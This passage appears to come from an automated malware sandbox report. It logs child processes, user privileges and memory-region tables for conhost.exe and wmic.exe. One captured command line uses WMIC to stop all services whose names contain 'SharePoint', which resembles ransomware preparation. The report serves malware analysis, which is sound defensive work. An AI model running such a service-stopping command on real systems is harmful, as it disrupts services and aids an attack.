CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0112.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.343] exit (_Code=0) Thread: id = 219 os_tid = 0xe30 Process: id = "44" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe36a000" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0xe18" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2874 start_va = 0x7fb5f000 end_va = 0x7fb5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb5f000" filename = "" Region: id = 2875 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2876 start_va = 0x7a60030000 end_va = 0x7a6004ffff entry_point = 0x0 region_type = private name = "private_0x0000007a60030000" filename = "" Region: id = 2877 start_va = 0x7a60050000 end_va = 0x7a60063fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a60050000" filename = "" Region: id = 2878 start_va = 0x7a60070000 end_va = 0x7a600affff entry_point = 0x0 region_type = private name = "private_0x0000007a60070000" filename = "" Region: id = 2879 start_va = 0x7df5ff6f0000 end_va = 0x7ff5ff6effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6f0000" filename = "" Region: id = 2880 start_va = 0x7ff6c4430000 end_va = 0x7ff6c4452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4430000" filename = "" Region: id = 2881 start_va = 0x7ff6c4457000 end_va = 0x7ff6c4457fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4457000" filename = "" Region: id = 2882 start_va = 0x7ff6c445e000 end_va = 0x7ff6c445ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c445e000" filename = "" Region: id = 2883 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2884 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2885 start_va = 0x7a60290000 end_va = 0x7a6038ffff entry_point = 0x0 region_type = private name = "private_0x0000007a60290000" filename = "" Region: id = 2886 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2887 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2888 start_va = 0x7a60030000 end_va = 0x7a6003ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a60030000" filename = "" Region: id = 2889 start_va = 0x7a60040000 end_va = 0x7a6004ffff entry_point = 0x0 region_type = private name = "private_0x0000007a60040000" filename = "" Region: id = 2890 start_va = 0x7a600b0000 end_va = 0x7a6016dfff entry_point = 0x7a600b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2891 start_va = 0x7a60170000 end_va = 0x7a601affff entry_point = 0x0 region_type = private name = "private_0x0000007a60170000" filename = "" Region: id = 2892 start_va = 0x7a601b0000 end_va = 0x7a601b6fff entry_point = 0x0 region_type = private name = "private_0x0000007a601b0000" filename = "" Region: id = 2893 start_va = 0x7a601c0000 end_va = 0x7a601c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a601c0000" filename = "" Region: id = 2894 start_va = 0x7a601d0000 end_va = 0x7a601d6fff entry_point = 0x0 region_type = private name = "private_0x0000007a601d0000" filename = "" Region: id = 2895 start_va = 0x7a601e0000 end_va = 0x7a601e0fff entry_point = 0x0 region_type = private name = "private_0x0000007a601e0000" filename = "" Region: id = 2896 start_va = 0x7a601f0000 end_va = 0x7a601f0fff entry_point = 0x0 region_type = private name = "private_0x0000007a601f0000" filename = "" Region: id = 2897 start_va = 0x7a60390000 end_va = 0x7a60517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a60390000" filename = "" Region: id = 2898 start_va = 0x7a60520000 end_va = 0x7a606a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a60520000" filename = "" Region: id = 2899 start_va = 0x7a606b0000 end_va = 0x7a61aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a606b0000" filename = "" Region: id = 2900 start_va = 0x7ff6c4330000 end_va = 0x7ff6c442ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4330000" filename = "" Region: id = 2901 start_va = 0x7ff6c445c000 end_va = 0x7ff6c445dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c445c000" filename = "" Region: id = 2902 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2903 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2904 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2905 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2906 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2907 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2908 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2909 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2910 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2911 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2912 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2913 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 216 os_tid = 0xe24 Thread: id = 217 os_tid = 0xe28 Thread: id = 218 os_tid = 0xe2c Process: id = "45" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1cee7000" os_pid = "0xe34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0xe18" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2927 start_va = 0x1a0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2928 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2929 start_va = 0x1d0000 end_va = 0x1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2930 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2931 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2932 start_va = 0x270000 end_va = 0x273fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 2933 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 2934 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2935 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 2936 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 2937 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2938 start_va = 0x7edb0000 end_va = 0x7edd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edb0000" filename = "" Region: id = 2939 start_va = 0x7edd8000 end_va = 0x7edd8fff entry_point = 0x0 region_type = private name = "private_0x000000007edd8000" filename = "" Region: id = 2940 start_va = 0x7eddc000 end_va = 0x7eddefff entry_point = 0x0 region_type = private name = "private_0x000000007eddc000" filename = "" Region: id = 2941 start_va = 0x7eddf000 end_va = 0x7eddffff entry_point = 0x0 region_type = private name = "private_0x000000007eddf000" filename = "" Region: id = 2942 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2943 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2944 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2945 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2946 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2947 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2948 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2949 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2950 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2951 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2952 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2953 start_va = 0x1b0000 end_va = 0x1b3fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2954 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 2955 start_va = 0x3f0000 end_va = 0x4adfff entry_point = 0x3f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2956 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2957 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2958 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2959 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2960 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2961 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2962 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2963 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2964 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2965 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2966 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2967 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2968 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2969 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2970 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2971 start_va = 0x7ecb0000 end_va = 0x7edaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecb0000" filename = "" Region: id = 2972 start_va = 0x7edd9000 end_va = 0x7eddbfff entry_point = 0x0 region_type = private name = "private_0x000000007edd9000" filename = "" Region: id = 2973 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2974 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2975 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2976 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2977 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2978 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2979 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2980 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2981 start_va = 0x6a0000 end_va = 0x9d6fff entry_point = 0x6a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2982 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2983 start_va = 0x500000 end_va = 0x5e8fff entry_point = 0x500000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2984 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2985 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2986 start_va = 0x9e0000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 2987 start_va = 0x510000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2988 start_va = 0x510000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2989 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2990 start_va = 0xb90000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2991 start_va = 0xd70000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 2992 start_va = 0x9e0000 end_va = 0xabefff entry_point = 0x9e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2993 start_va = 0xb80000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 2994 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2995 start_va = 0x510000 end_va = 0x510fff entry_point = 0x510000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2996 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2997 start_va = 0x520000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2998 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2999 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3000 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3001 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3002 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3003 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3004 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3005 start_va = 0x540000 end_va = 0x569fff entry_point = 0x540000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3006 start_va = 0xb90000 end_va = 0xd17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 3007 start_va = 0xd60000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 3008 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3009 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3010 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x540000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 3011 start_va = 0xd70000 end_va = 0xef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 3012 start_va = 0xf60000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 3013 start_va = 0x5770000 end_va = 0x6b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 3014 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3015 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3016 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3017 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3018 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3019 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3020 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3021 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3022 start_va = 0xac0000 end_va = 0xb77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3023 start_va = 0x570000 end_va = 0x573fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3024 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3025 start_va = 0xf70000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 3026 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3027 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3028 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3029 start_va = 0x630000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 3030 start_va = 0xd20000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 3031 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" 